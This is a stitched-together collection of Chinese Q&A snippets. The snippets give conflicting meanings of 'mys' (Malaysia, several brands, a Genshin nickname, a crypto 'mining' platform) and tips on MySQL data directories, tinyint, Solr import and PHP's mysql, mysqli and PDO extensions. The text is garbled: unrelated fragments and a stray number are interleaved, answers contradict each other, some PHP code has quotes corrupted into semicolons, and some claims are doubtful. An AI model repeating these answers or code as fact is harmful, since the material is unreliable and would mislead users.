mys

Go ahead to be your own star and light up yourself

肯定是三台县人民医院，再怎么说它也是国家的三级乙等医院，比绵阳市的妇幼保健院强。效益也是一样，医院项目众多，妇幼保健有专长，但是整体比不上县医院！

脆脆甜甜，满口清香，很好吃

我也不会的哦

什么意思

mys是美盈森品牌。又称MYS。成立于2000年，主要从事包装产品、标签产品、生产与销售等

前言MySQL数据库默认的数据库文件位于/var/lib/mysql下，有时候由于存储规划等原因，需要更改MySQL数据库的数据存储目录。下文总结整理了实践过程的操作步骤。话不多说了，一起来看看吧方法如下：1：确认MySQL数据库存储目录[root@DB-Server tmp]# mysqladmin -u root -p variables | grep datadirEnter password: | datadir | /var/lib/mysql/2：关闭MySQL服务在更改MySQL的数据目录前，必须关闭MySQL服务。方式1：[root@DB-Server ~]# service mysql statusMySQL running (9411)[ OK ][root@DB-Server ~]# service mysql stopShutting down MySQL..[ OK ][root@DB-Server ~]# 方式2：[root@DB-Server ~]# /etc/rc.d/init.d/mysql statusMySQL running (8900)[ OK ][root@DB-Server ~]# /etc/rc.d/init.d/mysql stopShutting down MySQL..[ OK ][root@DB-Server ~]# 3：创建新的数据库存储目录[root@DB-Server ~]# cd /u01[root@DB-Server u01]# mkdir mysqldata4：移动MySQL数据目录到新位置[root@DB-Server ~]# mv /var/lib/mysql /u01/mysqldata/5：修改配置文件my.cnf并不是所有版本都包含有my.cnf这个配置文件，在MySQL 5.5版本，我就找不到my.cnf这个配置文件， 而有些MySQL版本该文件位于/usr/my.cnf，如果/etc/目录下没有my.cnf配置文件，请到/usr/share/mysql/下找到*.cnf文件，拷贝其中一个到/etc/并改名为my.cnf中。命令如下：[root@DB-Server mysql]# cp /usr/share/mysql/my-medium.cnf /etc/my.cnf编辑/etc/my.cnf文件，修改参数socketMySQL 5.5 版本# The following options will be passed to all MySQL clients[client]#password = your_passwordport = 3306socket = /u01/mysqldata/mysql/mysql.sock# Here follows entries for some specific programs# The MySQL server[mysqld]port = 3306socket = /u01/mysqldata/mysql/mysql.sockskip-external-lockingkey_buffer_size = 16Mmax_allowed_packet = 1Mtable_open_cache = 64sort_buffer_size = 512Knet_buffer_length = 8Kread_buffer_size = 256Kread_rnd_buffer_size = 512Kmyisam_sort_buffer_size = 8M6：修改启动脚本/etc/init.d/mysql将参数datadir修改为datadir=/u01/mysqldata/mysql/7：启动MySQL服务并验证MySQL数据库路径[root@DB-Server ~]# service mysql startStarting MySQL..[ OK ][root@DB-Server ~]# mysqladmin -u root -p variables | grep datadirEnter password: | datadir | /u01/mysqldata/mysql/ 我的疑问：1： 在修改数据库的存储目录前，/var/lib/mysql/目录下根本没有mysql.sock文件，安装上面配置后，就会生成mysql.sock文件。关于mysql.sock文件，搜索了一下资料：mysql.sock是用于socket连接的文件。也就是只有你的守护进程启动起来这个文件才存在。但是你的mysql程序（这个程序是客户端，服务器端是mysqld）可以选择是否使用mysql.sock文件来连接（因为这个方法只适合在Unix主机上面连接本地的mysqld），对于非本地的任何类型的主机。那么这个文件是否一定需要的呢？ 这个需要进一步了解清楚。2：我在网上看有些网友总结的修改MySQL数据路径，有些需要给新建的目录的权限做一些处理，而有些有不用对目录权限进行授权，我没有处理，也没有什么问题。到底要不要对新的数据库目录授权呢？3：我在MySQL_5.6.20这个版本测试时，不修改my.cnf，只修改启动脚本/etc/init.d/mysql，也完全没有啥问题。也没有myssql.sock文件生成。4: 注意如果没有禁用selinux, 修改MySQL的数据路径后启动MySQL服务会遇到一些错误。关于这个的解释是后台服务都需要有对相应目录的对应权限，而 mysql 的默认路径/var/lib/mysql 已经添加了相应的策略，修改路径后由于没有相应的策略，导致后台进程读取文件被selinux阻止，从而出现权限错误。 所以要么关闭Selinux或修改文件安全上下文。[root@DB-Server mysql]# /etc/init.d/mysql startStarting MySQL....The server quit without updating PID file (/u01/mysqldata/mysql//DB-Server.localdomain.pid).[FAILED][root@DB-Server mysql]# [root@DB-Server mysql]# chcon -R -t mysqld_db_t /u01/mysqldata/mysql/[root@DB-Server mysql]# /etc/init.d/mysql startStarting MySQL.[ OK ][root@DB-Server mysql]# 总结

Navicat for MySQL是一款可视化操作Mysql数据库的软件，界面简单，方便使用。1、使用Navicat for MySQL之前当然先下载该软件，可以通过百度搜索查找 Navicat for MySQL。请认准百度安全验证最好到官方网站，或者正规网站站下载；2、下载完以后直接双击安装包，根据自己的的需要安装对应的组件以及指定对应的安装位置就可以了；3、打开Navicat for MySQL主界面如下图所示：4、点击主界面中的“链接”，会弹出一个添加链接的窗口；"连接名”可以任意输入，这个会窗口显示，建议输入容易识别和有意义的名称；“主机名或IP地址”必须输入有效MySql访问IP地址；“端口”一般默认为3306，如果有自定义MySql访问端口，则输入对应的自定义端口即可；“用户名”和“密码”则是对应访问MysSql数据库的帐号，注意如果连接的MySql是非本机服务，则使用“root”是无法链接成功，这是MySql的安全策略问题；点击“确认”则可以成功创建一个数据连接，并且会在左窗口显示，也可以点击“连接测试”，测试一下是否可以成功链接；5、点击左窗口链接，连接成功后，在左侧的导航窗口后会看到当前链接的所有的MySQL数据库，其中灰色的表示没有打开数据库，绿色的标识的就是已经被打开的数据库。右键点击一个灰色的数据库，在右键菜单中包含打开、关闭、新建、删除和数据传输等操作；在已经打开数据中的选中表，可以创建、删除、修改表，在右键菜单中包含建表、导入、导出、运行SQL文件等操作；6、在主窗口点击“查询”，则可以对当前选中的数据库进行表查询、以及对查询的创建、修改、删除等；7、在主窗口点击“视图”，则可以对当前选中的数据库进行添加、修改、删除、导出视图；8、在主窗口点击“函数”，则可以对当前选中的数据库进行添加、修改、删除、运行函数；9、在主窗口还有“事件”、“报表”、“备份”、“计划”、“模型”等菜单，这些都不怎么常用，不过基本也是创建、删除、修改等操作。

这个字写作mystery，意思是神秘的事物。y是半元音字母，当它作元音字母用时，发短元音/ɪ/的音，发音时，舌端靠近下齿，舌前部抬高，舌位中高，不接触上腭，牙床半合，没有摩擦，如：Fynn 芬恩gym 体育馆myth 神话happy 快乐的puppy 小狗baby 婴儿pony 小马lucky 幸运的。

windows2003本来就是过渡产品自我保护不是很好应该是病毒吧

先删缓存再更新数据库再重新加载缓存。对于解决现实业务问题那么这个问题其实是一个业务设计问题而不是技术问题，答案取决于修改是否需要实时生效，是否允许查看价格与结算价格存在不一致，是否需要严格的一致性等等，进而从价格的修改业务流程上进行设计。

新加坡公民、新加坡永久居民的身份证号格式一般以S或T开头，加上7位数字，再以一个字母结尾，如：S9123456Z；

这个是压缩包文件，而不是你的安装文件，当你用./configure安装的时候，应该有用--prefix指定安装路径，那么就进入你的指定安装路径中，那里面有这个文件例如：./configure --prefix=/usr/local/mysql cd /usr/local/mysql/scripts mysql_install_db --user=mysql

护肤品。护肤品，即保护皮肤的产品。随着社会经济的不断进步和物质生活的丰富，护肤品，不再是过去只有富人才用的起的东西。

去除脸部的污垢和垃圾。念肤mys有去除脸部的污垢和垃圾的效果，而且还可以去除老化的角质层，促进皮肤的胶原蛋白再生，达到了很好的祛痘功效。并且价格实惠，性价比高，深受消费者的喜爱。

内核高级STM8内核，具有3级流水线的哈佛结构扩展指令集存储器程序存储器：8K字节Flash；10K 次擦写后在55°C环境下数据可保存20年数据存储器：640 字节真正的数据EEPROM；可达30万次擦写RAM：1K字节

Mystic。网名指在网上使用的名字。由于网络是一个虚拟的世界，为了避免使用真实姓名带来的麻烦所以发明了网名。大写字母mys的网名是Mystic。网名是指网友在网络世界里的一个虚拟名称。

http://www.gougou.com/search?search=DVR%20VIEWER&id=0 硬盘录像机-DVR VIEWER软件 利用本软件，您可以： 1）在电脑上播放录制在 DVR硬盘中的影像。 2）可将 DVR硬盘中的影像存成静态的 BMP 图片档案。 3）可以备份DVR硬盘中的影像资料 (MYS格式)至其它的储存媒体。 4）可以备份DVR硬盘中的影像资料转存为较为普遍的 AVI 文件格式，这样利用电脑上的Windows Media Player或其他的通用播放软件就可以进行播放。补充：avi可以直接刻录，用nero 就可以

马来西亚 ！！！

mys回复别人可以直接发图。根据查询相关公开信息显示mys在更新后可以直接发图了。mys是软件马来西亚的缩写。

是马来西亚的三位字母简码。

马来西亚

mys化妆品品牌好。根据查询相关信息显示，米雅诗护肤品的办公地位于广东，米雅诗护肤品官网/官方旗舰店为其正规渠道，运营单位为广州雨晓生物制品有限公司。

没意思。在微博上mys是没意思的拼音缩写，是现代网络很流行的对话方式，所以微博上mys是指没意思。

原神mys的意思是米哈游。这个是原神的另一个叫法。原神账号的实名认证是无法修改的，但实名认证又分为MYS账号的认证和邮箱账号的实名认证。

区块链平台。MYS是一款全新的矿机矿池模式,一款可以轻松挖矿的区块链平台，十分简单,同时邀请好友还可以直接获得奖励。平台通常指高于区域的平面，楼房的阳台。

HS属性。MyS是类对象MyS的HS属性，这个时候的HS属性是读取，是执行类代码。MySQL是一个关系型数据库管理系统，由瑞典MySQLAB公司开发。

智能音响。根据天眼查资料，美盈森又称mys，是一家上市公司，成立于2000年，隶属深圳美盈森集团股份有限公司。mys音响是旗下的智能音响系列。音响，音响特指电器设备组合发出声音的一套音频系统。

mys是**美盈森**品牌。

马来西亚。根据查询相关公开信息显示，mys是马来西亚的缩写。马来西亚是君主立宪联邦制国家，位于东南亚，国土有东、西两部分，即马来半岛（西马）和加里曼丹岛北部（东马），地形主要是平原，地面平坦、起伏较小，境内自然资源丰富，橡胶、棕油和胡椒的产量和出口量居世界前列。

请问您是在哪里看到MYS的？ 1：国家，MYS指马来西亚 2：英文单词，不存在该单词！

MYS 多年期计划 MYS 明尼苏达州青年交响乐 MYS 映射您的放映 MYS 曼斯菲尔德青年足球 MYS 让你尖叫 MYS 让你的微笑 MYS 迈索尔，卡纳塔克 MYS 都市青年交响乐团 MYS 马来西亚 MYS 麦克莱恩青年足球

建议你使用一些mysql的客户端工具我一直在使用sqlyong。这个工具比较不错！

进到mysql客户端，或者使用phpmyadmin，执行如下命令：DROPTABLEIFEXISTS`tblTable1`;CREATETABLE`tblTable1`(`iNo`int(11)NOTNULLauto_increment,`strFieldName`varchar(255)NOTNULL,`intOrder`tinyint(4)default0,PRIMARYKEY(`iNo`))ENGINE=MyISAMDEFAULTCHARSET=utf8ROW_FORMAT=DYNAMICCOMMENT="数据表1";

create table student(id int(32) primary key auto_increment,--主键，自增长name varchar(64) not null,--非空age int(4) default 18,--默认值18);此为示例

function inorder($root) gcc version 4.2.1 (Based on Apple Inc. build 5658) (LLVM build 2336.11.00)configure:3438: $? = 0configure:3427: gcc -V >&5llvm-gcc-4.2: argument to `-V" is missingconfigure:3438: $? = 1configure:3427: gcc -qversion >&5i686-apple-darwin11-llvm-gcc-4.2: no input filesconfigure:3438: $? = 1

var mycars = new Array() Composite comp2 = new Composite("Composite XY"); comp2.Add(new Leaf("Leaf XYA")); comp2.Add(new Leaf("Leaf XYB")); root.Add(comp2); root.Add(new Leaf("Leaf C"));

0你保存的时候要写成‘0"就是外面加个单引号或双引号

mysql是不支持bool类型如果当把一个数据设置成bool类型的时候，数据库会自动转换成tinyint(1)的数据类型,其实这个就是变相的bool。 默认值也就是1,0两种,分别对应了bool的true和false

请问这个问题有没有解决？求解决方案，kettle直接把tinyint当成boolean解析了，我现在做一个数据库迁移的ETL，表示碰到了这个tinyint类型好蛋疼

可以为null

手动搞定喽，好像是改成byte类型，或者删掉不写也行

楼上正解。

把tinyint加长吧，比如tinyint(2)

在 MySQL 中，tinyint的取值范围是（）。 A.0-10B.100-1000C.0-255D.0-100正确答案：C

12341554421

tinyint是-128到127，无符号就乘2，也就是0到255

应该是用0和1来表示

在MySQL的数据类型中，Tinyint的取值范围是：带符号的范围是-128到127。无符号的范围是0到255Tinyint占用1字节的存储空间，即8位（bit）。那么Tinyint的取值范围怎么来的呢？我们先看无符号的情况。无符号的最小值即全部8位（bit）都为0，换算成十进制就是0，所以无符号的Tinyint的最小值为0.无符号的最大值即全部8bit都为1，11111111，换算成十进制就是255.为什么有符号的TINYINT的最小值是-128？虽然“-0”也是“0”，但根据正、反、补码体系，“-0”的补码和“+0”是不同的，这样就出现两个补码代表一个数值的情况。为了将补码与数字一一对应，所以人为规定“0”一律用“+0”代表。同时为了充分利用资源，就将原来本应该表示“-0”的补码规定为代表-128

你需要rowid 干什么呢？

MYSQL没有隐藏的rowid字段，这和informix、oracle等不一样的，要操作数据必须自己使用表上的主键。

可以试试：使用SolrQuery对象，SolrQuery solrQuery = new SolrQuery();//组装查询条件solrQuery.setQuery("*:*");String key = "java3";solrQuery.addFilterQuery("content:" + "*"+key+"*" ）;试试吧

在solr与tomcat整合文章中，我用的索引库是mycore，现在就以这个为例。首先要准备jar包：solr-dataimporthandler-4.8.1.jar、solr-dataimporthandler-extras-4.8.1.jar和mysql-connector-java-5.0.7-bin.jar这三个包到solr的tomcat的webappssolrWEB-INFlib下在这个文件夹的conf下配置两个文件，添加一个文件。先配置solrconfig.xml。在该文件下添加一个新节点。<requestHandler name="/dataimport" class="org.apache.solr.handler.dataimport.DataImportHandler"><lst name="defaults"><str name="config">data-config.xml</str></lst></requestHandler>在solrconfig.xml的同目录下创建data-config.xml。配置：复制代码<dataConfig><dataSource type="JdbcDataSource"driver="com.mysql.jdbc.Driver"url="jdbc:mysql://localhost:3306/courseman"user="root"password="mysql" /><document><entity name="student"query="SELECT * FROM student"><field column="id" name="id" /><field column="name" name="name" /><field column="gender" name="gender" /><field column="major" name="major" /><field column="grade" name="grade" /></entity></document></dataConfig>复制代码schemal.xml的配置复制代码<?xml version="1.0" ?><!--Licensed to the Apache Software Foundation (ASF) under one or morecontributor license agreements. See the NOTICE file distributed withthis work for additional information regarding copyright ownership.The ASF licenses this file to You under the Apache License, Version 2.0(the "License"); you may not use this file except in compliance withthe License. You may obtain a copy of the License atUnless required by applicable law or agreed to in writing, softwaredistributed under the License is distributed on an "AS IS" BASIS,WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.See the License for the specific language governing permissions andlimitations under the License.--><schema name="example core one" version="1.1"><fieldtype name="string" class="solr.StrField" sortMissingLast="true" omitNorms="true"/><fieldType name="long" class="solr.TrieLongField" precisionStep="0" positionIncrementGap="0"/><fieldType name="int" class="solr.TrieIntField" precisionStep="0" positionIncrementGap="0"/><!-- general --><field name="id" type="int" indexed="true" stored="true" /><field name="gender" type="string" indexed="true" stored="true" /><field name="name" type="string" indexed="true" stored="true" /><field name="major" type="string" indexed="true" stored="true" /><field name="grade" type="string" indexed="true" stored="true" /><field name="_version_" type="long" indexed="true" stored="true"/><!-- field to use to determine and enforce document uniqueness. --><uniqueKey>id</uniqueKey><!-- field for the QueryParser to use when an explicit fieldname is absent --><defaultSearchField>name</defaultSearchField><!-- SolrQueryParser configuration: defaultOperator="AND|OR" --><solrQueryParser defaultOperator="OR"/></schema>复制代码默认的文件不是这样的，稍微改动了一下。field 的type类型是根据fieldtype 的name定义的。class是solr自定义的不能更改。shcema.xml文件的field字段的属性介绍：（1）name：字段名称（2）type：字段类型（此处type不是java类型，而是下面定义的fieldType）（3）indexed：是否索引看true--solr会对这个字段进行索引，只有经过索引的字段才能被搜索、排序等；false--不索引（4）stored：是否存储看true--存储，当我们需要在页面显示此字段时，应设为true，否则false。（5）required：是否必须看true--此字段为必需，如果此字段的内容为空，会报异常；false--不是必需（6）multiValued：此字段是否可以保存多个值看（7）omitNorms：是否对此字段进行解析看有时候我们想通过某个字段的完全匹配来查询信息，那么设置 indexed="true"、omitNorms="true"。（8）default：设置默认值有这样一个FieldType描述：<fieldType name="text_general" positionIncrementGap="100"><analyzer type="index"><tokenizer/><filter ignoreCase="true" words="stopwords.txt" enablePositionIncrements="true" /><filter/></analyzer><analyzer type="query"><tokenizer/><filter ignoreCase="true" words="stopwords.txt" enablePositionIncrements="true" /><filter synonyms="synonyms.txt" ignoreCase="true" expand="true"/><filter/></analyzer></fieldType>属性说明：（1）name：类型名称，<field>中的type引用的就是这个name（2）class：solr自定义的类型（3）<analyzer type="index">定义建立索引时使用的分词器及过滤器（4）<analyzer type="query">定义搜索时所使用的分词器及过滤器（5）<tokenizer/>定义分词器（6）<filter/>定义过滤器uniqueKey属性<uniqueKey>id</uniqueKey>类似于数据表数据的id，solr索引库中最好定义一个用于标示document唯一性的字段，此字段主要用于删除document。defaultSearchField属性就是你在做query搜寻时若不指定特定栏位做检索时, Solr就会只查这个栏位.<defaultSearchField>default</defaultSearchField>copyField属性是用来复制你一个栏位里的值到另一栏位用. 如你可以将name里的东西copy到major里, 这样solr做检索时也会检索到name里的东西.<copyField source="name" dest="major"/>现在可以将数据库的数据导入solr了。点击Execute就可以了。

一： PHP-MySQL 是 PHP 操作 MySQL 资料库最原始的 Extension ，PHP-MySQLi 的 i 代表 Improvement ，提更了相对进阶的功能，就 Extension 而言，本身也增加了安全性。而 PDO (PHP Data Object) 则是提供了一个 Abstraction Layer 来操作资料库，用讲的其实看不出来有有什麽差别，所以就直接看程式吧… 首先，先来看一段用 PHP-MySQL 写成的程式码，这类的范例常用在世界各地： 复制代码代码如下:lt;?php mysql_connect($db_host, $db_user, $db_password); mysql_select_db($dn_name); $result = mysql_query(SELECT `name` FROM `users` WHERE `location` = ;$location;); while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { echo $row[;name;]; } mysql_free_result($result); ?; 乍看之下没什麽问题，但其实背后有些学问… 这种方式不能 Bind Column ，以前例的 SQL 叙述来说，$location 的地方容易被 SQL Injection。后来于是发展出了 mysql_escape_string() (备注：5.3.0之后弃用) 以及 mysql_real_escape_string() 来解决这个问题，不过这麽一搞，整个叙述会变得复杂且丑陋，而且如果栏位多了，可以想见会是怎样的情形… 复制代码代码如下:lt;?php $query = sprintf(SELECT * FROM users WHERE user=;%s; AND password=;%s;, mysql_real_escape_string($user), mysql_real_escape_string($password)); mysql_query($query); ?; 在 PHP-MySQLi 中有了不少进步，除了透过 Bind Column 来解决上述问题，而且也多援 Transaction, Multi Query ，并且同时提供了 Object oriented style (下面这段 PHP-MySQLi 范例的写法) 和 Procedural style (上面 PHP-MySQL 范例的写法)两种写法…等等。 复制代码代码如下:lt;?php $mysqli = new mysqli($db_host, $db_user, $db_password, $db_name); $sql = INSERT INTO `users` (id, name, gender, location) VALUES (?, ?, ?, ?); $stmt = $mysqli-;prepare($sql); $stmt-;bind_param(;dsss;, $source_id, $source_name, $source_gender, $source_location); $stmt-;execute(); $stmt-;bind_result($id, $name, $gender, $location); while ($stmt-;fetch()) { echo $id . $name . $gender . $location; } $stmt-;close(); $mysqli-;close(); ?; 但看到这边又发现了一些缺点，例如得 Bind Result，这个就有点多馀，不过这其实无关紧要，因为最大的问题还是在于这不是一个抽象(Abstraction)的方法，所以当后端更换资料库的时候，就是痛苦的开始… 于是 PDO 就出现了(备注：目前 Ubuntu 和 Debian 来说，PDO 并没有直接的套件可以安装，而是必须透过 PECL 安装)。

行数统计函数$conn = new PDO("mysql:host=$dbhost;dbname=$dbname", $dbuser, $dbpass);$query = $conn->query($sql)if($query->rowCount()<1) //判断结果是否为空

$sql="selectcount(*)fromtb_root";$result=$pdo->query($sql);//提交sql$rowsNumber=$result->fetchColumn();//取回结果集中的一个字段echo$rowsNumber;query方法用来提交select语句，exec方法一般用于insert,update,delete等对于普通的查询，可以这样做$sql="select*fromtb_root";$result=$pdo->query($sql);$rows=$result->fetchAll(PDO:FETCH_ASSOC);//取得所有行$rowsNumber=count($rows);echo$rowsNumber;

不是假冒。因为tommy jeans面料舒适，款式简单大方，做工也是很好的。tommy jeans以前叫hilfiger denim， 2018年春季正式更名为tommy jeans，属于tommy hilfiger的年轻线，风格更偏年轻化。注意事项自1985年以男装设计起家至今，TOMMY　HILFIGER品牌的产品类型不断增加，除服装、牛仔裤、配饰外，更包括鞋具、香水及寝室用品等，在世界各地之专门店及各大百货公司的专柜多达163家。1、男女装系列：Tommy Hilfiger包括了男性、女性、儿童、内衣、饰件以及定制服装。2、牛仔系列： Hilfiger Denim包括了面向18-28岁的年轻人以牛仔系列服装为主的服饰。3、香水系列：汤米·希尔费格香水包括了男性、女性、的年轻人香水化妆品等配饰。以上内容参考：Tommy Hilfiger中国官网-品牌故事

执行两次是什么情况?到底是那个字段插入了没?

PDO是PHP5新出来的东东，它是连接数据库的组件，听说以后php版本以PDO为默认连接，它可以适配多种数据库，mysql，mssql，oracle等，不像以前一种数据库有自己的连接方式和固定函数，它采取统一方式。那个快，现在我可以告诉你，mysql没测试过，但在mssql，oracle上测试过，PDO比传统要快将近10倍，特别是当web服务器与数据库不在同一计算机时，PDO显示的更快。这是我在单位老爷机上测试的。

常用的mysqli方法有以下几个mysqli_connect：连接认证mysqli_connect_error：连接失败的错误信息mysqli_close：关闭连接mysqli_errno：出现错误的编号mysqli_error：出现错误的信息mysqli_query：执行查询SQL指令mysqli_affected_rows：当前mysql操作受影响的行数（写操作）mysqli_num_rows：当前查询结果集中的行数mysqli_free_result：释放查询的结果集mysqli_fetch_row：从查询结果集中取出一条记录，返回一维数组（索引数组）mysqli_fetch_assoc：从查询结果集中取出一条记录，返回以为数组（关联数组：字段名作为下标）mysqli_fetch_all：从查询结果集中取出所有记录，返回二维数组PHP连接MySQL之原生MySQL函数总结一、配置连接数据库信息1.连接数据库mysql_connect($server, $username, $password)2.设置字符集 mysql_set_charset($charset)3.选择数据库mysql_select_db($database_name)二、向数据库发送并执行sql语句mysql_query($sql); sql语句执行失败则返回false，执行成功若有资源（执行查询等情况）的话返回资源，其余返回true。三、从返回的结果集中解析数据1.返回影响行数的mysql_num_rows($result) 取得结果集中行的数目mysql_affected_rows() 取得前一次操作所影响的记录行数mysql_insert_id(); 取得上一步插入操作产生的ID2.返回查询资源的（以下均是一次从结果集中取得一行记录）mysql_fetch_row() 数字索引mysql_fetch_assoc() 字段名索引mysql_fetch_array() 两者都有3.返回错误信息的mysql_error(); 文本错误信息mysql_errno(); 错误信息的数字编码四、关闭数据库连接mysql_close();PHP中的PDO函数库一、PDOPDO->beginTransaction() — 标明回滚起始点PDO->commit() — 标明回滚结束点，并执行SQLPDO->__construct() — 建立一个PDO链接数据库的实例PDO->errorCode() — 获取错误码PDO->errorInfo() — 获取错误的信息PDO->exec() — 处理一条SQL语句，并返回所影响的条目数PDO->getAttribute() — 获取一个“数据库连接对象”的属性PDO->getAvailableDrivers() — 获取有效的PDO驱动器名称PDO->lastInsertId() — 获取写入的最后一条数据的主键值PDO->prepare() — 生成一个“查询对象”PDO->query() — 处理一条SQL语句，并返回一个“PDOStatement”PDO->quote() — 为某个SQL中的字符串添加引号PDO->rollBack() — 执行回滚PDO->setAttribute() — 为一个“数据库连接对象”设定属性推荐教程：PHP视频教程

简单来说：PHP-MySQL 是 PHP 操作 MySQL 资料库最原始的 Extension PHP-MySQLi 的 i 代表 Improvement ，提更了相对进阶的功能，就 Extension 而言，本身也增加了安全性。PDO (PHP Data Object) 则是提供了一个 Abstraction Layer 来操作数据库。PHP-MySQLi操作db举例：<?php $mysqli = new mysqli($db_host, $db_user, $db_password, $db_name); $sql = "INSERT INTO `users` (id, name, gender, location) VALUES (?, ?, ?, ?)"; //构建插入的sql语句$stmt = $mysqli->prepare($sql); $stmt->bind_param("dsss", $source_id, $source_name, $source_gender, $source_location); //此处设置插入参数$stmt->execute(); //执行sql语句$stmt->bind_result($id, $name, $gender, $location); //获取结果并处理while ($stmt->fetch()) { echo $id . $name . $gender . $location; } $stmt->close(); $mysqli->close(); ?> PDO操作db举例：oga@carlisten-lx:~$ pecl search pdo //打开pdo======================================= Package Stable/(Latest) Local PDO 1.0.3 (stable) PHP Data Objects Interface. PDO_4D 0.3 (beta) PDO driver for 4D-SQL database PDO_DBLIB 1.0 (stable) FreeTDS/Sybase/MSSQL driver for PDO PDO_FIREBIRD 0.2 (beta) Firebird/InterBase 6 driver for PDO PDO_IBM 1.3.2 (stable) PDO driver for IBM databases PDO_INFORMIX 1.2.6 (stable) PDO driver for IBM Informix INFORMIX databases PDO_MYSQL 1.0.2 (stable) MySQL driver for PDO //加载驱动PDO_OCI 1.0 (stable) Oracle Call Interface driver for PDO PDO_ODBC 1.0.1 (stable) ODBC v3 Interface driver for PDO PDO_PGSQL 1.0.2 (stable) PostgreSQL driver for PDO PDO_SQLITE 1.0.1 (stable) SQLite v3 Interface driver for PDO pdo_user 0.3.0 (beta) Userspace driver for PDO

市面上都是用框架，用原生的太少了。你可以了解下thinkphp laravel 等这些市面上主流框架，框架内对数据库连接做了封装。很方便

$sql = "select * from tb_root";$res = $pdo->prepare($sql);//$res->exec();$res->execute();$num = $res->rowCount();

开启这个功能的具体方法就是设置php.ini文件，步骤如下：1、查看public_html目录下没有php.ini文件，如果有的，打开文件查找extension=php_pdo_mysql.dllextension=php_pdo.dll把前面的分号去掉,然后保存文件。2、如果没有，就新建一个文件php.in把下面两行添加进去extension=pdo.soextension=pdo_mysql.so注意：php.ini文件需要放到相应的目录下，比如另外绑定的域名则需要将php.ini文件放到相应的子目录下。总体原则就是哪个目录需要就把php.ini文件放到那个目录下。如何开启PDO,PDO_MYSQL扩展标签：

PDO扩展为PHP访问数据库定义了一个轻量级的、一致性的接口，它提供了一个数据访问抽象层，这样，无论使用什么数据库，都可以通过一致的函数执行查询和获取数据。在一些PHP管理系统需要开启PDO和PDO_MySQL扩展，方法很简单：1、找到php.ini文件2、打开后，搜索 extension=php_pdo.dll 和 extension=php_pdo_mysql.dll ，去掉前面“;”的注释。最终这两行配置内容如下：extension=php_pdo.dllextension=php_pdo_mysql.dll重新启动apache或者iis后，在phpinfo函数中查看，是否开启。

php安装pdo_mysql扩展的方法：1、编译安装mysql扩展，生成mysql.so；2、编辑php.ini配置文件，添加mysql.so；3、编译安装pdo_mysql。安装方法：（推荐教程：php视频教程）1、安装php mysql扩展# cd /usr/local/php-5.3.28/ext/mysql/# phpize# ./configure --with-php-config=/usr/local/php/bin/php-config --with-mysql=/usr注意： --with-mysql=/usr 这个参数使用find命令寻找mysql客户端安装目录# find / -name mysql.h/usr/include/mysql/mysql.h这里只需要写--with-mysql=/usr编译安装，生成mysql.so#make#make install修改php.ini 配置文件，添加mysql.soextension=mysql.so重启apache2、安装pdo_mysql# cd /usr/local/php-5.3.28/ext/pdo_mysql/# phpize# ./configure --with-php-config=/usr/local/php/bin/php-config --with-pdo-mysql=/usr/local/mysql后面的两个参数必须要添加，一开始我没有添加，结果分别都提示找不到php-config和mysql的header文件。# ./configure _with-php-config=/usr/local/php/bin/php-config _with-pdo-mysql=/usr/local/mysql报错如下：说找不到 zlib目录 ，加上这句就好了 _with-pdo-mysql=/usr/local/mysql编译安装，生成mysql.so#make#make install修改php.ini 配置文件，添加mysql.soextension=mysql.so重启apache

php与mysql的连接有三种API接口，分别是：PHP的MySQL扩展 、PHP的mysqli扩展 、PHP数据对象(PDO) ，下面针对以上三种连接方式做下总结，以备在不同场景下选出最优方案。一、特性及对比PHP的MySQL扩展是设计开发允许PHP应用与MySQL数据库交互的早期扩展。mysql扩展提供了一个面向过程 的接口，并且是针对MySQL4.1.3或更早版本设计的。因此，这个扩展虽然可以与MySQL4.1.3或更新的数据库服务端 进行交互，但并不支持后期MySQL服务端提供的一些特性。由于太过古老，又不安全，所以已被后来的mysqli完全取代。PHP的mysqli扩展，我们有时称之为MySQL增强扩展，可以用于使用 MySQL4.1.3或更新版本中新的高级特性。其特点为：面向对象接口 、prepared语句支持、多语句执行支持、事务支持 、增强的调试能力、嵌入式服务支持 、预处理方式完全解决了sql注入的问题。不过其也有缺点， 就是只支持mysql数据库。如果你要是不操作其他的数据库，这无疑是最好的选择。PDO是PHP Data Objects的缩写，其是PHP应用中的一个数据库抽象层规范。PDO提供了一个统一的API接口可以使得你的PHP应用不去关心具体要 连接的数据库服务器系统类型。也就是说，如果你使用PDO的API，可以在任何需要的时候无缝切换数据库服务器，比如从oracle 到MySQL，仅仅需要修改很少的PHP代码。其功能类似于JDBC、ODBC、DBI之类接口。同样，其也解决了sql注入问题，有很好的安全性。不过他也有缺点，某些多语句执行查询不支持（不过该情况很少）。

使用传统的 mysql_connect 、mysql_query方法来连接查询数据库时，如果过滤不严紧，就有SQL注入风险。虽然可以用mysql_real_escape_string()函数过滤用户提交的值，但是也有缺陷。而使用PHP的PDO扩展的 prepare 方法，就可以避免sql injection 风险。PDO(PHP Data Object) 是PHP5新加入的一个重大功能，因为在PHP 5以前的php4/php3都是一堆的数据库扩展来跟各个数据库的连接和处理，如 php_mysql.dll。 PHP6中也将默认使用PDO的方式连接，mysql扩展将被作为辅助 。官方地址：http://php.com/manual/en/book.pdo.php1. PDO配置使用PDO扩展之前，先要启用这个扩展，php.ini中，去掉"extension=php_pdo.dll"前面的";"号，若要连接数据库，还需要去掉与PDO相关的数据库扩展前面的";"号（一般用的是php_pdo_mysql.dll），然后重启Apache服务器即可。extension=php_pdo.dll extension=php_pdo_mysql.dll2. PDO连接mysql数据库$dbh = new PDO("mysql:host=localhost;dbname=mydb","root","password");默认不是长连接，若要使用数据库长连接，可以在最后加如下参数：$dbh = new PDO("mysql:host=localhost;dbname=mydb","root","password","array(PDO::ATTR_PERSISTENT => true) "); $dbh = null; //(释放)3. PDO设置属性PDO有三种错误处理方式：PDO::ERrmODE_SILENT不显示错误信息，只设置错误码PDO::ERrmODE_WARNING显示警告错PDO::ERrmODE_EXCEPTION抛出异常可通过以下语句来设置错误处理方式为抛出异常$db->setAttribute(PDO::ATTR_ERrmODE, PDO::ERrmODE_EXCEPTION);因为不同数据库对返回的字段名称大小写处理不同，所以PDO提供了PDO::ATTR_CASE设置项（包括PDO::CASE_LOWER，PDO::CASE_NATURAL，PDO::CASE_UPPER），来确定返回的字段名称的大小写。通过设置PDO::ATTR_ORACLE_NULLS类型（包括PDO::NULL_NATURAL，PDO::NULL_EmpTY_STRING，PDO::NULL_TO_STRING）来指定数据库返回的NULL值在php中对应的数值。4. PDO常用方法及其应用PDO::query() 